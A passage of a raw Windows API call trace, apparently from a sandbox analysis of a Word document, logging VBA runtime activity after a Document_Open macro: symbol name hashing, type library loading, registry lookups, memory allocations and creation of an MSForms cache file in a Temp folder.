szName="Document_Open") returned 0x1089c1 [0030.692] strcpy_s (in: _Dst=0x2e7040, _DstSize=0xe, _Src="Document_Open" | out: _Dst="Document_Open") returned 0x0 [0030.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7040, cbMultiByte=14, lpWideCharStr=0x2e6e90, cchWideChar=14 | out: lpWideCharStr="Document_Open") returned 14 [0030.692] IUnknown:AddRef (This=0x782a220) returned 0x6 [0030.692] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Document_Open", lHashVal=0x1089c1, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.692] IUnknown:Release (This=0x782a220) returned 0x5 [0030.692] IUnknown:AddRef (This=0x731da90) returned 0xe [0030.692] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Document_Open", lHashVal=0x1089c1, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.692] IUnknown:Release (This=0x731da90) returned 0xd [0030.692] IUnknown:AddRef (This=0x731cc80) returned 0x8 [0030.692] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="Document_Open", lHashVal=0x1089c1, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.692] IUnknown:Release (This=0x731cc80) returned 0x7 [0030.692] IUnknown:AddRef (This=0x7829f50) returned 0x5 [0030.692] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="Document_Open", lHashVal=0x1089c1, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.692] IUnknown:Release (This=0x7829f50) returned 0x4 [0030.692] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0x7809960 [0030.692] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0xb51e240 [0030.693] IMalloc:Alloc (This=0x7fefe015380, cb=0x3d0) returned 0xb524a30 [0030.693] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667b90 [0030.693] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490a10 [0030.693] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7838a10 [0030.693] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6390 [0030.693] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f63a0 [0030.693] IUnknown:AddRef (This=0x782a220) returned 0x6 [0030.693] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x76db640 [0030.693] IUnknown:AddRef (This=0x731da90) returned 0xf [0030.693] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x76db680 [0030.693] IUnknown:AddRef (This=0x731cc80) returned 0x8 [0030.693] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x76db6c0 [0030.693] IUnknown:AddRef (This=0x7829f50) returned 0x5 [0030.693] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x76db700 [0030.693] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x76db740 [0030.693] IMalloc:Alloc (This=0x7fefe015380, cb=0x640) returned 0xb50c100 [0030.693] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76677a0 [0030.693] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f63b0 [0030.693] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f63c0 [0030.693] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667770 [0030.693] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7838aa0 [0030.693] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0030.693] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Open") returned 0x100767 [0030.694] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x76db780 [0030.694] IMalloc:Alloc (This=0x7fefe015380, cb=0x640) returned 0xb50c750 [0030.694] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667920 [0030.694] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f63d0 [0030.694] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f63e0 [0030.694] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667620 [0030.694] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7838b30 [0030.694] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ARTSWrite") returned 0x1085c8 [0030.694] strcpy_s (in: _Dst=0x2e7040, _DstSize=0xa, _Src="ARTSWrite" | out: _Dst="ARTSWrite") returned 0x0 [0030.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7040, cbMultiByte=10, lpWideCharStr=0x2e6e90, cchWideChar=10 | out: lpWideCharStr="ARTSWrite") returned 10 [0030.694] IUnknown:AddRef (This=0x782a220) returned 0x7 [0030.694] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="ARTSWrite", lHashVal=0x1085c8, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.694] IUnknown:Release (This=0x782a220) returned 0x6 [0030.694] IUnknown:AddRef (This=0x731da90) returned 0x12 [0030.694] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="ARTSWrite", lHashVal=0x1085c8, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.694] IUnknown:Release (This=0x731da90) returned 0x11 [0030.694] IUnknown:AddRef (This=0x731cc80) returned 0x9 [0030.694] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="ARTSWrite", lHashVal=0x1085c8, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.694] IUnknown:Release (This=0x731cc80) returned 0x8 [0030.694] IUnknown:AddRef (This=0x7829f50) returned 0x6 [0030.694] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="ARTSWrite", lHashVal=0x1085c8, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.694] IUnknown:Release (This=0x7829f50) returned 0x5 [0030.694] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NumOfDeviceNames") returned 0x102896 [0030.694] strcpy_s (in: _Dst=0x2e7040, _DstSize=0x11, _Src="NumOfDeviceNames" | out: _Dst="NumOfDeviceNames") returned 0x0 [0030.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7040, cbMultiByte=17, lpWideCharStr=0x2e6e90, cchWideChar=17 | out: lpWideCharStr="NumOfDeviceNames") returned 17 [0030.694] IUnknown:AddRef (This=0x782a220) returned 0x7 [0030.694] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="NumOfDeviceNames", lHashVal=0x102896, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.694] IUnknown:Release (This=0x782a220) returned 0x6 [0030.694] IUnknown:AddRef (This=0x731da90) returned 0x12 [0030.694] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="NumOfDeviceNames", lHashVal=0x102896, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.694] IUnknown:Release (This=0x731da90) returned 0x11 [0030.694] IUnknown:AddRef (This=0x731cc80) returned 0x9 [0030.695] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="NumOfDeviceNames", lHashVal=0x102896, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.695] IUnknown:Release (This=0x731cc80) returned 0x8 [0030.695] IUnknown:AddRef (This=0x7829f50) returned 0x6 [0030.695] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="NumOfDeviceNames", lHashVal=0x102896, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.695] IUnknown:Release (This=0x7829f50) returned 0x5 [0030.695] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GetDeviceName") returned 0x10f552 [0030.695] strcpy_s (in: _Dst=0x2e7040, _DstSize=0xe, _Src="GetDeviceName" | out: _Dst="GetDeviceName") returned 0x0 [0030.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7040, cbMultiByte=14, lpWideCharStr=0x2e6e90, cchWideChar=14 | out: lpWideCharStr="GetDeviceName") returned 14 [0030.695] IUnknown:AddRef (This=0x782a220) returned 0x7 [0030.695] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="GetDeviceName", lHashVal=0x10f552, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.695] IUnknown:Release (This=0x782a220) returned 0x6 [0030.695] IUnknown:AddRef (This=0x731da90) returned 0x12 [0030.695] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="GetDeviceName", lHashVal=0x10f552, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.695] IUnknown:Release (This=0x731da90) returned 0x11 [0030.695] IUnknown:AddRef (This=0x731cc80) returned 0x9 [0030.695] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="GetDeviceName", lHashVal=0x10f552, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.695] IUnknown:Release (This=0x731cc80) returned 0x8 [0030.695] IUnknown:AddRef (This=0x7829f50) returned 0x6 [0030.695] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="GetDeviceName", lHashVal=0x10f552, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.695] IUnknown:Release (This=0x7829f50) returned 0x5 [0030.695] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="plug_error") returned 0x102c90 [0030.695] strcpy_s (in: _Dst=0x2e7040, _DstSize=0xb, _Src="plug_error" | out: _Dst="plug_error") returned 0x0 [0030.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7040, cbMultiByte=11, lpWideCharStr=0x2e6e90, cchWideChar=11 | out: lpWideCharStr="plug_error") returned 11 [0030.695] IUnknown:AddRef (This=0x782a220) returned 0x7 [0030.695] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="plug_error", lHashVal=0x102c90, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.695] IUnknown:Release (This=0x782a220) returned 0x6 [0030.695] IUnknown:AddRef (This=0x731da90) returned 0x12 [0030.695] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="plug_error", lHashVal=0x102c90, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.695] IUnknown:Release (This=0x731da90) returned 0x11 [0030.695] IUnknown:AddRef (This=0x731cc80) returned 0x9 [0030.695] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="plug_error", lHashVal=0x102c90, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.695] IUnknown:Release (This=0x731cc80) returned 0x8 [0030.695] IUnknown:AddRef (This=0x7829f50) returned 0x6 [0030.695] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="plug_error", lHashVal=0x102c90, pfName=0x2e6f60, pBstrLibName=0x2e6e90 | out: pfName=0x2e6f60*=0, pBstrLibName=0x2e6e90) returned 0x0 [0030.695] IUnknown:Release (This=0x7829f50) returned 0x5 [0030.696] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="plug") returned 0x10ba29 [0030.696] IMalloc:Alloc (This=0x7fefe015380, cb=0x14) returned 0xb490d70 [0030.696] IMalloc:Alloc (This=0x7fefe015380, cb=0x70) returned 0xb46ea30 [0030.696] IUnknown:AddRef (This=0x782a220) returned 0x7 [0030.696] strcpy_s (in: _Dst=0x7801408, _DstSize=0x43, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0030.696] strcpy_s (in: _Dst=0x7801458, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0030.696] IUnknown:AddRef (This=0x731da90) returned 0x12 [0030.696] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb4ffb40 [0030.696] strcpy_s (in: _Dst=0xb4ffb68, _DstSize=0x3b, _Src="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Dst="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0030.697] strcpy_s (in: _Dst=0xb4ffbb0, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0030.697] IUnknown:AddRef (This=0x731cc80) returned 0x9 [0030.697] strcpy_s (in: _Dst=0xb4ffc20, _DstSize=0x20, _Src="C:\\Windows\\system32\\stdole2.tlb" | out: _Dst="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0030.697] strcpy_s (in: _Dst=0xb4ffc48, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0030.698] IUnknown:AddRef (This=0x7829f50) returned 0x6 [0030.699] strcpy_s (in: _Dst=0xb4ffcb8, _DstSize=0x40, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0030.699] strcpy_s (in: _Dst=0xb4ffd00, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0030.699] IUnknown:AddRef (This=0x782b300) returned 0x3 [0030.699] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb4ffd90 [0030.700] strcpy_s (in: _Dst=0xb4ffdd0, _DstSize=0x1d, _Src="C:\\Windows\\system32\\FM20.DLL" | out: _Dst="C:\\Windows\\system32\\FM20.DLL") returned 0x0 [0030.700] strcpy_s (in: _Dst=0xb4ffd58, _DstSize=0x8, _Src="MSForms" | out: _Dst="MSForms") returned 0x0 [0030.700] CLSIDFromString (in: lpsz="{47391987-526A-45DC-AC64-BAA206303800}", pclsid=0x2e6de0 | out: pclsid=0x2e6de0*(Data1=0x47391987, Data2=0x526a, Data3=0x45dc, Data4=([0]=0xac, [1]=0x64, [2]=0xba, [3]=0xa2, [4]=0x6, [5]=0x30, [6]=0x38, [7]=0x0))) returned 0x0 [0030.700] swprintf_s (in: _Dst=0x2e69c8, _SizeInWords=0xc, _Format="%x." | out: _Dst="2.") returned 2 [0030.700] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="Typelib", ulOptions=0x0, samDesired=0x20019, phkResult=0x2e69a8 | out: phkResult=0x2e69a8*=0xa3e) returned 0x0 [0030.700] StringFromGUID2 (in: rguid=0x2e6d10*(Data1=0xd452ee1, Data2=0xe08f, Data3=0x101a, Data4=([0]=0x85, [1]=0x2e, [2]=0x2, [3]=0x60, [4]=0x8c, [5]=0x4d, [6]=0xb, [7]=0xb4)), lpsz=0x2e69e0, cchMax=39 | out: lpsz="{0D452EE1-E08F-101A-852E-02608C4D0BB4}") returned 39 [0030.700] RegOpenKeyExW (in: hKey=0xa3e, lpSubKey="{0D452EE1-E08F-101A-852E-02608C4D0BB4}", ulOptions=0x0, samDesired=0x20019, phkResult=0x2e69b0 | out: phkResult=0x2e69b0*=0xa52) returned 0x0 [0030.700] RegEnumKeyExW (in: hKey=0xa52, dwIndex=0x0, lpName=0x2e6a30, lpcchName=0x2e6994, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="2.0", lpcchName=0x2e6994, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.701] wcsncmp (_String1="2.", _String2="2.", _MaxCount=0x2) returned 0 [0030.720] RegEnumKeyExW (in: hKey=0xa52, dwIndex=0x1, lpName=0x2e6a30, lpcchName=0x2e6994, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="2.0", lpcchName=0x2e6994, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0030.721] RegCloseKey (hKey=0xa52) returned 0x0 [0030.721] RegCloseKey (hKey=0xa3e) returned 0x0 [0030.721] LoadRegTypeLib (in: rguid=0x2e6de0*(Data1=0x47391987, Data2=0x526a, Data3=0x45dc, Data4=([0]=0xac, [1]=0x64, [2]=0xba, [3]=0xa2, [4]=0x6, [5]=0x30, [6]=0x38, [7]=0x0)), wVerMajor=0x2, wVerMinor=0x0, lcid=0x0, pptlib=0x2e6ca8*=0x0 | out: pptlib=0x2e6ca8*=0x0) returned 0x8002801d [0030.723] QueryPathOfRegTypeLib (in: guid=0xb4c6620*(Data1=0xd452ee1, Data2=0xe08f, Data3=0x101a, Data4=([0]=0x85, [1]=0x2e, [2]=0x2, [3]=0x60, [4]=0x8c, [5]=0x4d, [6]=0xb, [7]=0xb4)), wMaj=0xffff, wMin=0xffff, lcid=0x0, lpbstrPathName=0x2e6cd8 | out: lpbstrPathName=0x2e6cd8) returned 0x0 [0030.731] LoadTypeLib (in: szFile="C:\\Windows\\system32\\FM20.DLL", pptlib=0x2e6cb0*=0x0 | out: pptlib=0x2e6cb0*=0x782b300) returned 0x0 [0030.731] ITypeLib:RemoteGetLibAttr (in: This=0x782b300, ppTLibAttr=0x2e6cf0, pDummy=0x0 | out: ppTLibAttr=0x2e6cf0, pDummy=0x0) returned 0x0 [0030.734] lstrlenA (lpString="VBE") returned 3 [0030.734] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 37 [0030.734] _msize (_Block=0x93b7ca0) returned 0x26 [0030.734] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 37 [0030.734] lstrlenA (lpString="VBE") returned 3 [0030.734] _msize (_Block=0x93b7c40) returned 0x26 [0030.734] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 37 [0030.734] lstrlenA (lpString="VBE") returned 3 [0030.734] lstrcatA (in: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", lpString2="VBE" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" [0030.734] strcpy_s (in: _Dst=0x93be640, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0030.735] strcpy_s (in: _Dst=0x93be640, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0030.735] strcpy_s (in: _Dst=0x93be640, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0030.735] strcpy_s (in: _Dst=0x93be640, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0030.735] strcpy_s (in: _Dst=0x93be640, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0030.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x93be640, cbMultiByte=-1, lpWideCharStr=0x2e6810, cchWideChar=41 | out: lpWideCharStr="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 41 [0030.736] IMalloc:Alloc (This=0x7fefe015380, cb=0xf8) returned 0xb459cf0 [0030.736] IMalloc:Alloc (This=0x7fefe015380, cb=0x54) returned 0x7809960 [0030.736] wcscpy_s (in: _Destination=0x7809960, _SizeInWords=0x2a, _Source="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Destination="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0030.736] LoadTypeLib (in: szFile="C:\\Windows\\system32\\FM20.DLL", pptlib=0x2e6ad8*=0x0 | out: pptlib=0x2e6ad8*=0x782b300) returned 0x0 [0030.737] ITypeLib:RemoteGetDocumentation (in: This=0x782b300, index=-1, refPtrFlags=0x2e6af0, pBstrName=0x2e6b28, pBstrDocString=0x2e6b68, pdwHelpContext=0x2e6b18, pBstrHelpFile=0x0 | out: pBstrName=0x2e6b28*="Microsoft Forms 2.0 Object Library", pBstrDocString=0x2e6b68, pdwHelpContext=0x2e6b18*=0x7809a88, pBstrHelpFile=0x0) returned 0x0 [0030.746] IMalloc:Alloc (This=0x7fefe015380, cb=0x6a) returned 0xb46eb30 [0030.746] wcscpy_s (in: _Destination=0xb46eb30, _SizeInWords=0x35, _Source="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE\\" | out: _Destination="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE\\") returned 0x0 [0030.746] wcscat_s (in: _Destination="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE\\", _SizeInWords=0x35, _Source="MSForms" | out: _Destination="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE\\MSForms") returned 0x0 [0030.746] wcscat_s (in: _Destination="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE\\MSForms", _SizeInWords=0x35, _Source=".exd" | out: _Destination="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE\\MSForms.exd") returned 0x0 [0030.746] ITypeLib:RemoteGetLibAttr (in: This=0x782b300, ppTLibAttr=0x2e6ae0, pDummy=0x7fee3a7ae52 | out: ppTLibAttr=0x2e6ae0, pDummy=0x7fee3a7ae52*=0x0) returned 0x0 [0030.746] LoadTypeLibEx (in: szFile="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE\\MSForms.exd", regkind=0x2, pptlib=0x2e6ca8*=0x0 | out: pptlib=0x2e6ca8*=0x0) returned 0x80029c4a [0030.748] CoCreateGuid (in: pguid=0x2e6b08 | out: pguid=0x2e6b08*(Data1=0x4efeb580, Data2=0x181d, Data3=0x466e, Data4=([0]=0x88, [1]=0xfd, [2]=0x21, [3]=0xda, [4]=0x71, [5]=0x3, [6]=0xe4, [7]=0x66))) returned 0x0 [0030.748] IUnknown:AddRef (This=0x782b300) returned 0x7 [0030.748] ITypeLib:RemoteGetTypeInfoCount (in: This=0x782b300, pcTInfo=0x782b8a8 | out: pcTInfo=0x782b8a8*=0xfd6c3ae0) returned 0xab [0030.749] IMalloc:Alloc (This=0x7fefe015380, cb=0xd5c) returned 0xb50cda0 [0030.749] IMalloc:GetSize (This=0x7fefe015380, pv=0xb50cda0) returned 0xd5c [0030.750] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x76678f0 [0030.750] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7667410 [0030.750] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7667650 [0030.750] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7667560 [0030.750] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x76672f0 [0030.750] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7667470 [0030.750] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7667440 [0030.750] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7667a40 [0030.751] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7667290 [0030.751] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x76673e0 [0030.751] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x0, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cbe88) returned 0x0 [0030.752] IUnknown:Release (This=0x7809ba8) returned 0x2 [0030.752] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cbe88, ppTypeAttr=0x2e6a20, pDummy=0x7809c50 | out: ppTypeAttr=0x2e6a20, pDummy=0x7809c50*=0x0) returned 0x0 [0030.752] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cbe88) returned 0x0 [0030.752] IUnknown:Release (This=0xb4cbe88) returned 0x1 [0030.752] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x1, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cbee0) returned 0x0 [0030.753] IUnknown:Release (This=0x7809cc8) returned 0x2 [0030.753] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cbee0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.753] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cbee0) returned 0x0 [0030.753] IUnknown:Release (This=0xb4cbee0) returned 0x1 [0030.753] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x2, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cbf38) returned 0x0 [0030.754] IUnknown:Release (This=0x7809d28) returned 0x2 [0030.754] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cbf38, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.754] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cbf38) returned 0x0 [0030.754] IUnknown:Release (This=0xb4cbf38) returned 0x1 [0030.754] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x3, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cbf90) returned 0x0 [0030.755] IUnknown:Release (This=0x7809d88) returned 0x2 [0030.755] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cbf90, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.755] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cbf90) returned 0x0 [0030.755] IUnknown:Release (This=0xb4cbf90) returned 0x1 [0030.755] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x4, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cbfe8) returned 0x0 [0030.756] IUnknown:Release (This=0x7809de8) returned 0x2 [0030.756] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cbfe8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.756] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cbfe8) returned 0x0 [0030.756] IUnknown:Release (This=0xb4cbfe8) returned 0x1 [0030.756] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x5, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc040) returned 0x0 [0030.756] IUnknown:Release (This=0x7809e48) returned 0x2 [0030.756] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc040, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.756] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc040) returned 0x0 [0030.756] IUnknown:Release (This=0xb4cc040) returned 0x1 [0030.756] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x6, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc098) returned 0x0 [0030.757] IUnknown:Release (This=0x7809ea8) returned 0x2 [0030.757] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc098, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.757] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc098) returned 0x0 [0030.757] IUnknown:Release (This=0xb4cc098) returned 0x1 [0030.757] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x7, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc0f0) returned 0x0 [0030.758] IUnknown:Release (This=0x7809f08) returned 0x2 [0030.758] ITypeInfo:RemoteGetTypeAttr (in: 